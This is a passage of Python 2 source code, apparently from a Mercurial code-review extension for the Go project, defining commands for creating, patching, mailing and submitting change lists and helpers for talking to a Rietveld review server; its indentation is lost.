# except that some Plan 9 code uses four spaces as the label indent,
# so allow that.
if line.startswith(' ') and not re.match(' [A-Za-z0-9_]+:', line):
badfiles.append(f)
break
except:
# ignore cannot open file, etc.
pass
if len(badfiles) > 0:
msg = "these files use spaces for indentation (use tabs instead):\n\t" + "\n\t".join(badfiles)
if just_warn:
ui.warn("warning: " + msg + "\n")
else:
raise util.Abort(msg)
return
#######################################################################
# Mercurial commands
# every command must take a ui and and repo as arguments.
# opts is a dict where you can find other command line flags
#
# Other parameters are taken in order from items on the command line that
# don't start with a dash. If no default value is given in the parameter list,
# they are required.
#
def change(ui, repo, *pats, **opts):
"""create, edit or delete a change list
Create, edit or delete a change list.
A change list is a group of files to be reviewed and submitted together,
plus a textual description of the change.
Change lists are referred to by simple alphanumeric names.
Changes must be reviewed before they can be submitted.
In the absence of options, the change command opens the
change list for editing in the default editor.
Deleting a change with the -d or -D flag does not affect
the contents of the files listed in that change. To revert
the files listed in a change, use
hg revert @123456
before running hg change -d 123456.
"""
if missing_codereview:
return missing_codereview
dirty = {}
if len(pats) > 0 and GoodCLName(pats[0]):
name = pats[0]
if len(pats) != 1:
return "cannot specify CL name and file patterns"
pats = pats[1:]
cl, err = LoadCL(ui, repo, name, web=True)
if err != '':
return err
if not cl.local and (opts["stdin"] or not opts["stdout"]):
return "cannot change non-local CL " + name
else:
if repo[None].branch() != "default":
return "cannot run hg change outside default branch"
name = "new"
cl = CL("new")
dirty[cl] = True
files = ChangedFiles(ui, repo, pats, opts, taken=Taken(ui, repo))
if opts["delete"] or opts["deletelocal"]:
if opts["delete"] and opts["deletelocal"]:
return "cannot use -d and -D together"
flag = "-d"
if opts["deletelocal"]:
flag = "-D"
if name == "new":
return "cannot use "+flag+" with file patterns"
if opts["stdin"] or opts["stdout"]:
return "cannot use "+flag+" with -i or -o"
if not cl.local:
return "cannot change non-local CL " + name
if opts["delete"]:
if cl.copied_from:
return "original author must delete CL; hg change -D will remove locally"
PostMessage(ui, cl.name, "*** Abandoned ***", send_mail=cl.mailed)
EditDesc(cl.name, closed=True, private=cl.private)
cl.Delete(ui, repo)
return
if opts["stdin"]:
s = sys.stdin.read()
clx, line, err = ParseCL(s, name)
if err != '':
return "error parsing change list: line %d: %s" % (line, err)
if clx.desc is not None:
cl.desc = clx.desc;
dirty[cl] = True
if clx.reviewer is not None:
cl.reviewer = clx.reviewer
dirty[cl] = True
if clx.cc is not None:
cl.cc = clx.cc
dirty[cl] = True
if clx.files is not None:
cl.files = clx.files
dirty[cl] = True
if clx.private != cl.private:
cl.private = clx.private
dirty[cl] = True
if not opts["stdin"] and not opts["stdout"]:
if name == "new":
cl.files = files
err = EditCL(ui, repo, cl)
if err != "":
return err
dirty[cl] = True
for d, _ in dirty.items():
name = d.name
d.Flush(ui, repo)
if name == "new":
d.Upload(ui, repo, quiet=True)
if opts["stdout"]:
ui.write(cl.EditorText())
elif opts["pending"]:
ui.write(cl.PendingText())
elif name == "new":
if ui.quiet:
ui.write(cl.name)
else:
ui.write("CL created: " + cl.url + "\n")
return
def code_login(ui, repo, **opts):
"""log in to code review server
Logs in to the code review server, saving a cookie in
a file in your home directory.
"""
if missing_codereview:
return missing_codereview
MySend(None)
def clpatch(ui, repo, clname, **opts):
"""import a patch from the code review server
Imports a patch from the code review server into the local client.
If the local client has already modified any of the files that the
patch modifies, this command will refuse to apply the patch.
Submitting an imported patch will keep the original author's
name as the Author: line but add your own name to a Committer: line.
"""
if repo[None].branch() != "default":
return "cannot run hg clpatch outside default branch"
return clpatch_or_undo(ui, repo, clname, opts, mode="clpatch")
def undo(ui, repo, clname, **opts):
"""undo the effect of a CL
Creates a new CL that undoes an earlier CL.
After creating the CL, opens the CL text for editing so that
you can add the reason for the undo to the description.
"""
if repo[None].branch() != "default":
return "cannot run hg undo outside default branch"
return clpatch_or_undo(ui, repo, clname, opts, mode="undo")
def release_apply(ui, repo, clname, **opts):
"""apply a CL to the release branch
Creates a new CL copying a previously committed change
from the main branch to the release branch.
The current client must either be clean or already be in
the release branch.
The release branch must be created by starting with a
clean client, disabling the code review plugin, and running:
hg update weekly.YYYY-MM-DD
hg branch release-branch.rNN
hg commit -m 'create release-branch.rNN'
hg push --new-branch
Then re-enable the code review plugin.
People can test the release branch by running
hg update release-branch.rNN
in a clean client. To return to the normal tree,
hg update default
Move changes since the weekly into the release branch
using hg release-apply followed by the usual code review
process and hg submit.
When it comes time to tag the release, record the
final long-form tag of the release-branch.rNN
in the *default* branch's .hgtags file. That is, run
hg update default
and then edit .hgtags as you would for a weekly.
"""
c = repo[None]
if not releaseBranch:
return "no active release branches"
if c.branch() != releaseBranch:
if c.modified() or c.added() or c.removed():
raise util.Abort("uncommitted local changes - cannot switch branches")
err = hg.clean(repo, releaseBranch)
if err:
return err
try:
err = clpatch_or_undo(ui, repo, clname, opts, mode="backport")
if err:
raise util.Abort(err)
except Exception, e:
hg.clean(repo, "default")
raise e
return None
def rev2clname(rev):
# Extract CL name from revision description.
# The last line in the description that is a codereview URL is the real one.
# Earlier lines might be part of the user-written description.
all = re.findall('(?m)^http://codereview.appspot.com/([0-9]+)$', rev.description())
if len(all) > 0:
return all[-1]
return ""
undoHeader = """undo CL %s / %s
<enter reason for undo>
««« original CL description
"""
undoFooter = """
»»»
"""
backportHeader = """[%s] %s
««« CL %s / %s
"""
backportFooter = """
»»»
"""
# Implementation of clpatch/undo.
def clpatch_or_undo(ui, repo, clname, opts, mode):
if missing_codereview:
return missing_codereview
if mode == "undo" or mode == "backport":
if hgversion < '1.4':
# Don't have cmdutil.match (see implementation of sync command).
return "hg is too old to run hg %s - update to 1.4 or newer" % mode
# Find revision in Mercurial repository.
# Assume CL number is 7+ decimal digits.
# Otherwise is either change log sequence number (fewer decimal digits),
# hexadecimal hash, or tag name.
# Mercurial will fall over long before the change log
# sequence numbers get to be 7 digits long.
if re.match('^[0-9]{7,}$', clname):
found = False
matchfn = cmdutil.match(repo, [], {'rev': None})
def prep(ctx, fns):
pass
for ctx in cmdutil.walkchangerevs(repo, matchfn, {'rev': None}, prep):
rev = repo[ctx.rev()]
# Last line with a code review URL is the actual review URL.
# Earlier ones might be part of the CL description.
n = rev2clname(rev)
if n == clname:
found = True
break
if not found:
return "cannot find CL %s in local repository" % clname
else:
rev = repo[clname]
if not rev:
return "unknown revision %s" % clname
clname = rev2clname(rev)
if clname == "":
return "cannot find CL name in revision description"
# Create fresh CL and start with patch that would reverse the change.
vers = short(rev.node())
cl = CL("new")
desc = str(rev.description())
if mode == "undo":
cl.desc = (undoHeader % (clname, vers)) + desc + undoFooter
else:
cl.desc = (backportHeader % (releaseBranch, line1(desc), clname, vers)) + desc + undoFooter
v1 = vers
v0 = short(rev.parents()[0].node())
if mode == "undo":
arg = v1 + ":" + v0
else:
vers = v0
arg = v0 + ":" + v1
patch = RunShell(["hg", "diff", "--git", "-r", arg])
else: # clpatch
cl, vers, patch, err = DownloadCL(ui, repo, clname)
if err != "":
return err
if patch == emptydiff:
return "codereview issue %s has no diff" % clname
# find current hg version (hg identify)
ctx = repo[None]
parents = ctx.parents()
id = '+'.join([short(p.node()) for p in parents])
# if version does not match the patch version,
# try to update the patch line numbers.
if vers != "" and id != vers:
# "vers in repo" gives the wrong answer
# on some versions of Mercurial. Instead, do the actual
# lookup and catch the exception.
try:
repo[vers].description()
except:
return "local repository is out of date; sync to get %s" % (vers)
patch1, err = portPatch(repo, patch, vers, id)
if err != "":
if not opts["ignore_hgpatch_failure"]:
return "codereview issue %s is out of date: %s (%s->%s)" % (clname, err, vers, id)
else:
patch = patch1
argv = ["hgpatch"]
if opts["no_incoming"] or mode == "backport":
argv += ["--checksync=false"]
try:
cmd = subprocess.Popen(argv, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=None, close_fds=sys.platform != "win32")
except:
return "hgpatch: " + ExceptionDetail()
out, err = cmd.communicate(patch)
if cmd.returncode != 0 and not opts["ignore_hgpatch_failure"]:
return "hgpatch failed"
cl.local = True
cl.files = out.strip().split()
if not cl.files and not opts["ignore_hgpatch_failure"]:
return "codereview issue %s has no changed files" % clname
files = ChangedFiles(ui, repo, [], opts)
extra = Sub(cl.files, files)
if extra:
ui.warn("warning: these files were listed in the patch but not changed:\n\t" + "\n\t".join(extra) + "\n")
cl.Flush(ui, repo)
if mode == "undo":
err = EditCL(ui, repo, cl)
if err != "":
return "CL created, but error editing: " + err
cl.Flush(ui, repo)
else:
ui.write(cl.PendingText() + "\n")
# portPatch rewrites patch from being a patch against
# oldver to being a patch against newver.
def portPatch(repo, patch, oldver, newver):
lines = patch.splitlines(True) # True = keep \n
delta = None
for i in range(len(lines)):
line = lines[i]
if line.startswith('--- a/'):
file = line[6:-1]
delta = fileDeltas(repo, file, oldver, newver)
if not delta or not line.startswith('@@ '):
continue
# @@ -x,y +z,w @@ means the patch chunk replaces
# the original file's line numbers x up to x+y with the
# line numbers z up to z+w in the new file.
# Find the delta from x in the original to the same
# line in the current version and add that delta to both
# x and z.
m = re.match('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@', line)
if not m:
return None, "error parsing patch line numbers"
n1, len1, n2, len2 = int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4))
d, err = lineDelta(delta, n1, len1)
if err != "":
return "", err
n1 += d
n2 += d
lines[i] = "@@ -%d,%d +%d,%d @@\n" % (n1, len1, n2, len2)
newpatch = ''.join(lines)
return newpatch, ""
# fileDelta returns the line number deltas for the given file's
# changes from oldver to newver.
# The deltas are a list of (n, len, newdelta) triples that say
# lines [n, n+len) were modified, and after that range the
# line numbers are +newdelta from what they were before.
def fileDeltas(repo, file, oldver, newver):
cmd = ["hg", "diff", "--git", "-r", oldver + ":" + newver, "path:" + file]
data = RunShell(cmd, silent_ok=True)
deltas = []
for line in data.splitlines():
m = re.match('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@', line)
if not m:
continue
n1, len1, n2, len2 = int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4))
deltas.append((n1, len1, n2+len2-(n1+len1)))
return deltas
# lineDelta finds the appropriate line number delta to apply to the lines [n, n+len).
# It returns an error if those lines were rewritten by the patch.
def lineDelta(deltas, n, len):
d = 0
for (old, oldlen, newdelta) in deltas:
if old >= n+len:
break
if old+len > n:
return 0, "patch and recent changes conflict"
d = newdelta
return d, ""
def download(ui, repo, clname, **opts):
"""download a change from the code review server
Download prints a description of the given change list
followed by its diff, downloaded from the code review server.
"""
if missing_codereview:
return missing_codereview
cl, vers, patch, err = DownloadCL(ui, repo, clname)
if err != "":
return err
ui.write(cl.EditorText() + "\n")
ui.write(patch + "\n")
return
def file(ui, repo, clname, pat, *pats, **opts):
"""assign files to or remove files from a change list
Assign files to or (with -d) remove files from a change list.
The -d option only removes files from the change list.
It does not edit them or remove them from the repository.
"""
if missing_codereview:
return missing_codereview
pats = tuple([pat] + list(pats))
if not GoodCLName(clname):
return "invalid CL name " + clname
dirty = {}
cl, err = LoadCL(ui, repo, clname, web=False)
if err != '':
return err
if not cl.local:
return "cannot change non-local CL " + clname
files = ChangedFiles(ui, repo, pats, opts)
if opts["delete"]:
oldfiles = Intersect(files, cl.files)
if oldfiles:
if not ui.quiet:
ui.status("# Removing files from CL. To undo:\n")
ui.status("# cd %s\n" % (repo.root))
for f in oldfiles:
ui.status("# hg file %s %s\n" % (cl.name, f))
cl.files = Sub(cl.files, oldfiles)
cl.Flush(ui, repo)
else:
ui.status("no such files in CL")
return
if not files:
return "no such modified files"
files = Sub(files, cl.files)
taken = Taken(ui, repo)
warned = False
for f in files:
if f in taken:
if not warned and not ui.quiet:
ui.status("# Taking files from other CLs. To undo:\n")
ui.status("# cd %s\n" % (repo.root))
warned = True
ocl = taken[f]
if not ui.quiet:
ui.status("# hg file %s %s\n" % (ocl.name, f))
if ocl not in dirty:
ocl.files = Sub(ocl.files, files)
dirty[ocl] = True
cl.files = Add(cl.files, files)
dirty[cl] = True
for d, _ in dirty.items():
d.Flush(ui, repo)
return
def gofmt(ui, repo, *pats, **opts):
"""apply gofmt to modified files
Applies gofmt to the modified files in the repository that match
the given patterns.
"""
if missing_codereview:
return missing_codereview
files = ChangedExistingFiles(ui, repo, pats, opts)
files = [f for f in files if f.endswith(".go")]
if not files:
return "no modified go files"
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
try:
cmd = ["gofmt", "-l"]
if not opts["list"]:
cmd += ["-w"]
if os.spawnvp(os.P_WAIT, "gofmt", cmd + files) != 0:
raise util.Abort("gofmt did not exit cleanly")
except error.Abort, e:
raise
except:
raise util.Abort("gofmt: " + ExceptionDetail())
return
def mail(ui, repo, *pats, **opts):
"""mail a change for review
Uploads a patch to the code review server and then sends mail
to the reviewer and CC list asking for a review.
"""
if missing_codereview:
return missing_codereview
cl, err = CommandLineCL(ui, repo, pats, opts, defaultcc=defaultcc)
if err != "":
return err
cl.Upload(ui, repo, gofmt_just_warn=True)
if not cl.reviewer:
# If no reviewer is listed, assign the review to defaultcc.
# This makes sure that it appears in the
# codereview.appspot.com/user/defaultcc
# page, so that it doesn't get dropped on the floor.
if not defaultcc:
return "no reviewers listed in CL"
cl.cc = Sub(cl.cc, defaultcc)
cl.reviewer = defaultcc
cl.Flush(ui, repo)
if cl.files == []:
return "no changed files, not sending mail"
cl.Mail(ui, repo)
def pending(ui, repo, *pats, **opts):
"""show pending changes
Lists pending changes followed by a list of unassigned but modified files.
"""
if missing_codereview:
return missing_codereview
m = LoadAllCL(ui, repo, web=True)
names = m.keys()
names.sort()
for name in names:
cl = m[name]
ui.write(cl.PendingText() + "\n")
files = DefaultFiles(ui, repo, [], opts)
if len(files) > 0:
s = "Changed files not in any CL:\n"
for f in files:
s += "\t" + f + "\n"
ui.write(s)
def reposetup(ui, repo):
global original_match
if original_match is None:
start_status_thread()
original_match = cmdutil.match
cmdutil.match = ReplacementForCmdutilMatch
RietveldSetup(ui, repo)
def CheckContributor(ui, repo, user=None):
set_status("checking CONTRIBUTORS file")
user, userline = FindContributor(ui, repo, user, warn=False)
if not userline:
raise util.Abort("cannot find %s in CONTRIBUTORS" % (user,))
return userline
def FindContributor(ui, repo, user=None, warn=True):
if not user:
user = ui.config("ui", "username")
if not user:
raise util.Abort("[ui] username is not configured in .hgrc")
user = user.lower()
m = re.match(r".*<(.*)>", user)
if m:
user = m.group(1)
if user not in contributors:
if warn:
ui.warn("warning: cannot find %s in CONTRIBUTORS\n" % (user,))
return user, None
user, email = contributors[user]
return email, "%s <%s>" % (user, email)
def submit(ui, repo, *pats, **opts):
"""submit change to remote repository
Submits change to remote repository.
Bails out if the local repository is not in sync with the remote one.
"""
if missing_codereview:
return missing_codereview
# We already called this on startup but sometimes Mercurial forgets.
set_mercurial_encoding_to_utf8()
repo.ui.quiet = True
if not opts["no_incoming"] and Incoming(ui, repo, opts):
return "local repository out of date; must sync before submit"
cl, err = CommandLineCL(ui, repo, pats, opts, defaultcc=defaultcc)
if err != "":
return err
user = None
if cl.copied_from:
user = cl.copied_from
userline = CheckContributor(ui, repo, user)
typecheck(userline, str)
about = ""
if cl.reviewer:
about += "R=" + JoinComma([CutDomain(s) for s in cl.reviewer]) + "\n"
if opts.get('tbr'):
tbr = SplitCommaSpace(opts.get('tbr'))
cl.reviewer = Add(cl.reviewer, tbr)
about += "TBR=" + JoinComma([CutDomain(s) for s in tbr]) + "\n"
if cl.cc:
about += "CC=" + JoinComma([CutDomain(s) for s in cl.cc]) + "\n"
if not cl.reviewer:
return "no reviewers listed in CL"
if not cl.local:
return "cannot submit non-local CL"
# upload, to sync current patch and also get change number if CL is new.
if not cl.copied_from:
cl.Upload(ui, repo, gofmt_just_warn=True)
# check gofmt for real; allowed upload to warn in order to save CL.
cl.Flush(ui, repo)
CheckFormat(ui, repo, cl.files)
about += "%s%s\n" % (server_url_base, cl.name)
if cl.copied_from:
about += "\nCommitter: " + CheckContributor(ui, repo, None) + "\n"
typecheck(about, str)
if not cl.mailed and not cl.copied_from: # in case this is TBR
cl.Mail(ui, repo)
# submit changes locally
date = opts.get('date')
if date:
opts['date'] = util.parsedate(date)
typecheck(opts['date'], str)
opts['message'] = cl.desc.rstrip() + "\n\n" + about
typecheck(opts['message'], str)
if opts['dryrun']:
print "NOT SUBMITTING:"
print "User: ", userline
print "Message:"
print Indent(opts['message'], "\t")
print "Files:"
print Indent('\n'.join(cl.files), "\t")
return "dry run; not submitted"
m = match.exact(repo.root, repo.getcwd(), cl.files)
node = repo.commit(ustr(opts['message']), ustr(userline), opts.get('date'), m)
if not node:
return "nothing changed"
# push to remote; if it fails for any reason, roll back
try:
log = repo.changelog
rev = log.rev(node)
parents = log.parentrevs(rev)
if (rev-1 not in parents and
(parents == (nullrev, nullrev) or
len(log.heads(log.node(parents[0]))) > 1 and
(parents[1] == nullrev or len(log.heads(log.node(parents[1]))) > 1))):
# created new head
raise util.Abort("local repository out of date; must sync before submit")
# push changes to remote.
# if it works, we're committed.
# if not, roll back
other = getremote(ui, repo, opts)
r = repo.push(other, False, None)
if r == 0:
raise util.Abort("local repository out of date; must sync before submit")
except:
real_rollback()
raise
# we're committed. upload final patch, close review, add commit message
changeURL = short(node)
url = other.url()
m = re.match("^https?://([^@/]+@)?([^.]+)\.googlecode\.com/hg/?", url)
if m:
changeURL = "http://code.google.com/p/%s/source/detail?r=%s" % (m.group(2), changeURL)
else:
print >>sys.stderr, "URL: ", url
pmsg = "*** Submitted as " + changeURL + " ***\n\n" + opts['message']
# When posting, move reviewers to CC line,
# so that the issue stops showing up in their "My Issues" page.
PostMessage(ui, cl.name, pmsg, reviewers="", cc=JoinComma(cl.reviewer+cl.cc))
if not cl.copied_from:
EditDesc(cl.name, closed=True, private=cl.private)
cl.Delete(ui, repo)
c = repo[None]
if c.branch() == releaseBranch and not c.modified() and not c.added() and not c.removed():
ui.write("switching from %s to default branch.\n" % releaseBranch)
err = hg.clean(repo, "default")
if err:
return err
return None
def sync(ui, repo, **opts):
"""synchronize with remote repository
Incorporates recent changes from the remote repository
into the local repository.
"""
if missing_codereview:
return missing_codereview
if not opts["local"]:
ui.status = sync_note
ui.note = sync_note
other = getremote(ui, repo, opts)
modheads = repo.pull(other)
err = commands.postincoming(ui, repo, modheads, True, "tip")
if err:
return err
commands.update(ui, repo, rev="default")
sync_changes(ui, repo)
def sync_note(msg):
# we run sync (pull -u) in verbose mode to get the
# list of files being updated, but that drags along
# a bunch of messages we don't care about.
# omit them.
if msg == 'resolving manifests\n':
return
if msg == 'searching for changes\n':
return
if msg == "couldn't find merge tool hgmerge\n":
return
sys.stdout.write(msg)
def sync_changes(ui, repo):
# Look through recent change log descriptions to find
# potential references to http://.*/our-CL-number.
# Double-check them by looking at the Rietveld log.
def Rev(rev):
desc = repo[rev].description().strip()
for clname in re.findall('(?m)^http://(?:[^\n]+)/([0-9]+)$', desc):
if IsLocalCL(ui, repo, clname) and IsRietveldSubmitted(ui, clname, repo[rev].hex()):
ui.warn("CL %s submitted as %s; closing\n" % (clname, repo[rev]))
cl, err = LoadCL(ui, repo, clname, web=False)
if err != "":
ui.warn("loading CL %s: %s\n" % (clname, err))
continue
if not cl.copied_from:
EditDesc(cl.name, closed=True, private=cl.private)
cl.Delete(ui, repo)
if hgversion < '1.4':
get = util.cachefunc(lambda r: repo[r].changeset())
changeiter, matchfn = cmdutil.walkchangerevs(ui, repo, [], get, {'rev': None})
n = 0
for st, rev, fns in changeiter:
if st != 'iter':
continue
n += 1
if n > 100:
break
Rev(rev)
else:
matchfn = cmdutil.match(repo, [], {'rev': None})
def prep(ctx, fns):
pass
for ctx in cmdutil.walkchangerevs(repo, matchfn, {'rev': None}, prep):
Rev(ctx.rev())
# Remove files that are not modified from the CLs in which they appear.
all = LoadAllCL(ui, repo, web=False)
changed = ChangedFiles(ui, repo, [], {})
for _, cl in all.items():
extra = Sub(cl.files, changed)
if extra:
ui.warn("Removing unmodified files from CL %s:\n" % (cl.name,))
for f in extra:
ui.warn("\t%s\n" % (f,))
cl.files = Sub(cl.files, extra)
cl.Flush(ui, repo)
if not cl.files:
if not cl.copied_from:
ui.warn("CL %s has no files; delete (abandon) with hg change -d %s\n" % (cl.name, cl.name))
else:
ui.warn("CL %s has no files; delete locally with hg change -D %s\n" % (cl.name, cl.name))
return
def upload(ui, repo, name, **opts):
"""upload diffs to the code review server
Uploads the current modifications for a given change to the server.
"""
if missing_codereview:
return missing_codereview
repo.ui.quiet = True
cl, err = LoadCL(ui, repo, name, web=True)
if err != "":
return err
if not cl.local:
return "cannot upload non-local change"
cl.Upload(ui, repo)
print "%s%s\n" % (server_url_base, cl.name)
return
review_opts = [
('r', 'reviewer', '', 'add reviewer'),
('', 'cc', '', 'add cc'),
('', 'tbr', '', 'add future reviewer'),
('m', 'message', '', 'change description (for new change)'),
]
cmdtable = {
# The ^ means to show this command in the help text that
# is printed when running hg with no arguments.
"^change": (
change,
[
('d', 'delete', None, 'delete existing change list'),
('D', 'deletelocal', None, 'delete locally, but do not change CL on server'),
('i', 'stdin', None, 'read change list from standard input'),
('o', 'stdout', None, 'print change list to standard output'),
('p', 'pending', None, 'print pending summary to standard output'),
],
"[-d | -D] [-i] [-o] change# or FILE ..."
),
"^clpatch": (
clpatch,
[
('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
('', 'no_incoming', None, 'disable check for incoming changes'),
],
"change#"
),
# Would prefer to call this codereview-login, but then
# hg help codereview prints the help for this command
# instead of the help for the extension.
"code-login": (
code_login,
[],
"",
),
"^download": (
download,
[],
"change#"
),
"^file": (
file,
[
('d', 'delete', None, 'delete files from change list (but not repository)'),
],
"[-d] change# FILE ..."
),
"^gofmt": (
gofmt,
[
('l', 'list', None, 'list files that would change, but do not edit them'),
],
"FILE ..."
),
"^pending|p": (
pending,
[],
"[FILE ...]"
),
"^mail": (
mail,
review_opts + [
] + commands.walkopts,
"[-r reviewer] [--cc cc] [change# | file ...]"
),
"^release-apply": (
release_apply,
[
('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
('', 'no_incoming', None, 'disable check for incoming changes'),
],
"change#"
),
# TODO: release-start, release-tag, weekly-tag
"^submit": (
submit,
review_opts + [
('', 'no_incoming', None, 'disable initial incoming check (for testing)'),
('n', 'dryrun', None, 'make change only locally (for testing)'),
] + commands.walkopts + commands.commitopts + commands.commitopts2,
"[-r reviewer] [--cc cc] [change# | file ...]"
),
"^sync": (
sync,
[
('', 'local', None, 'do not pull changes from remote repository')
],
"[--local]",
),
"^undo": (
undo,
[
('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
('', 'no_incoming', None, 'disable check for incoming changes'),
],
"change#"
),
"^upload": (
upload,
[],
"change#"
),
}
#######################################################################
# Wrappers around upload.py for interacting with Rietveld
# HTML form parser
class FormParser(HTMLParser):
def __init__(self):
self.map = {}
self.curtag = None
self.curdata = None
HTMLParser.__init__(self)
def handle_starttag(self, tag, attrs):
if tag == "input":
key = None
value = ''
for a in attrs:
if a[0] == 'name':
key = a[1]
if a[0] == 'value':
value = a[1]
if key is not None:
self.map[key] = value
if tag == "textarea":
key = None
for a in attrs:
if a[0] == 'name':
key = a[1]
if key is not None:
self.curtag = key
self.curdata = ''
def handle_endtag(self, tag):
if tag == "textarea" and self.curtag is not None:
self.map[self.curtag] = self.curdata
self.curtag = None
self.curdata = None
def handle_charref(self, name):
self.handle_data(unichr(int(name)))
def handle_entityref(self, name):
import htmlentitydefs
if name in htmlentitydefs.entitydefs:
self.handle_data(htmlentitydefs.entitydefs[name])
else:
self.handle_data("&" + name + ";")
def handle_data(self, data):
if self.curdata is not None:
self.curdata += data
def JSONGet(ui, path):
try:
data = MySend(path, force_auth=False)
typecheck(data, str)
d = fix_json(json.loads(data))
except:
ui.warn("JSONGet %s: %s\n" % (path, ExceptionDetail()))
return None
return d
# Clean up json parser output to match our expectations:
# * all strings are UTF-8-encoded str, not unicode.
# * missing fields are missing, not None,
# so that d.get("foo", defaultvalue) works.
def fix_json(x):
if type(x) in [str, int, float, bool, type(None)]:
pass
elif type(x) is unicode:
x = x.encode("utf-8")
elif type(x) is list:
for i in range(len(x)):
x[i] = fix_json(x[i])
elif type(x) is dict:
todel = []
for k in x:
if x[k] is None:
todel.append(k)
else:
x[k] = fix_json(x[k])
for k in todel:
del x[k]
else:
raise util.Abort("unknown type " + str(type(x)) + " in fix_json")
if type(x) is str:
x = x.replace('\r\n', '\n')
return x
def IsRietveldSubmitted(ui, clname, hex):
dict = JSONGet(ui, "/api/" + clname + "?messages=true")
if dict is None:
return False
for msg in dict.get("messages", []):
text = msg.get("text", "")
m = re.match('\*\*\* Submitted as [^*]*?([0-9a-f]+) \*\*\*', text)
if m is not None and len(m.group(1)) >= 8 and hex.startswith(m.group(1)):
return True
return False
def IsRietveldMailed(cl):
for msg in cl.dict.get("messages", []):
if msg.get("text", "").find("I'd like you to review this change") >= 0:
return True
return False
def DownloadCL(ui, repo, clname):
set_status("downloading CL " + clname)
cl, err = LoadCL(ui, repo, clname, web=True)
if err != "":
return None, None, None, "error loading CL %s: %s" % (clname, err)
# Find most recent diff
diffs = cl.dict.get("patchsets", [])
if not diffs:
return None, None, None, "CL has no patch sets"
patchid = diffs[-1]
patchset = JSONGet(ui, "/api/" + clname + "/" + str(patchid))
if patchset is None:
return None, None, None, "error loading CL patchset %s/%d" % (clname, patchid)
if patchset.get("patchset", 0) != patchid:
return None, None, None, "malformed patchset information"
vers = ""
msg = patchset.get("message", "").split()
if len(msg) >= 3 and msg[0] == "diff" and msg[1] == "-r":
vers = msg[2]
diff = "/download/issue" + clname + "_" + str(patchid) + ".diff"
diffdata = MySend(diff, force_auth=False)
# Print warning if email is not in CONTRIBUTORS file.
email = cl.dict.get("owner_email", "")
if not email:
return None, None, None, "cannot find owner for %s" % (clname)
him = FindContributor(ui, repo, email)
me = FindContributor(ui, repo, None)
if him == me:
cl.mailed = IsRietveldMailed(cl)
else:
cl.copied_from = email
return cl, vers, diffdata, ""
def MySend(request_path, payload=None,
content_type="application/octet-stream",
timeout=None, force_auth=True,
**kwargs):
"""Run MySend1 maybe twice, because Rietveld is unreliable."""
try:
return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
except Exception, e:
if type(e) != urllib2.HTTPError or e.code != 500: # only retry on HTTP 500 error
raise
print >>sys.stderr, "Loading "+request_path+": "+ExceptionDetail()+"; trying again in 2 seconds."
time.sleep(2)
return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
# Like upload.py Send but only authenticates when the
# redirect is to www.google.com/accounts. This keeps
# unnecessary redirects from happening during testing.
def MySend1(request_path, payload=None,
content_type="application/octet-stream",
timeout=None, force_auth=True,
**kwargs):
"""Sends an RPC and returns the response.
Args:
request_path: The path to send the request to, eg /api/appversion/create.
payload: The body of the request, or None to send an empty request.
content_type: The Content-Type header to use.
timeout: timeout in seconds; default None i.e. no timeout.
(Note: for large requests on OS X, the timeout doesn't work right.)
kwargs: Any keyword arguments are converted into query string parameters.
Returns:
The response body, as a string.
"""
# TODO: Don't require authentication. Let the server say
# whether it is necessary.
global rpc
if rpc == None:
rpc = GetRpcServer(upload_options)
self = rpc
if not self.authenticated and force_auth:
self._Authenticate()
if request_path is None:
return
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
try:
tries = 0
while True:
tries += 1
args = dict(kwargs)
url = "http://%s%s" % (self.host, request_path)
if args:
url += "?" + urllib.urlencode(args)
req = self._CreateRequest(url=url, data=payload)
req.add_header("Content-Type", content_type)
try:
f = self.opener.open(req)
response = f.read()
f.close()
# Translate \r\n into \n, because Rietveld doesn't.
response = response.replace('\r\n', '\n')
# who knows what urllib will give us
if type(response) == unicode:
response = response.encode("utf-8")
typecheck(response, str)
return response
except urllib2.HTTPError, e:
if tries > 3:
raise
elif e.code == 401:
self._Authenticate()
elif e.code == 302:
loc = e.info()["location"]
if not loc.startswith('https://www.google.com/a') or loc.find('/ServiceLogin') < 0:
return ''
self._Authenticate()
else:
raise
finally:
socket.setdefaulttimeout(old_timeout)
def GetForm(url):
f = FormParser()
f.feed(ustr(MySend(url))) # f.feed wants unicode
f.close()
# convert back to utf-8 to restore sanity
m = {}
for k,v in f.map.items():
m[k.encode("utf-8")] = v.replace("\r\n", "\n").encode("utf-8")
return m
def EditDesc(issue, subject=None, desc=None, reviewers=None, cc=None, closed=False, private=False):
set_status("uploading change to description")
form_fields = GetForm("/" + issue + "/edit")
if subject is not None:
form_fields['subject'] = subject
if desc is not None:
form_fields['description'] = desc
if reviewers is not None:
form_fields['reviewers'] = reviewers
if cc is not None:
form_fields['cc'] = cc
if closed:
form_fields['closed'] = "checked"
if private:
form_fields['private'] = "checked"
ctype, body = EncodeMultipartFormData(form_fields.items(), [])
response = MySend("/" + issue + "/edit", body, content_type=ctype)
if response != "":
print >>sys.stderr, "Error editing description:\n" + "Sent form: \n", form_fields, "\n", response
sys.exit(2)
def PostMessage(ui, issue, message, reviewers=None, cc=None, send_mail=True, subject=None):
set_status("uploading message")
form_fields = GetForm("/" + issue + "/publish")
if reviewers is not None:
form_fields['reviewers'] = reviewers
if cc is not None:
form_fields['cc'] = cc
if send_mail:
form_fields['send_mail'] = "checked"
else:
del form_fields['send_mail']
if subject is not None:
form_fields['subject'] = subject
form_fields['message'] = message
form_fields['message_only'] = '1' # Don't include draft comments
if reviewers is not None or cc is not None:
form_fields['message_only'] = '' # Must set '' in order to override cc/reviewer
ctype = "applications/x-www-form-urlencoded"
body = urllib.urlencode(form_fields)
response = MySend("/" + issue + "/publish", body, content_type=ctype)
if response != "":
print response
sys.exit(2)
class opt(object):
pass
def nocommit(*pats, **opts):
"""(disabled when using this extension)"""
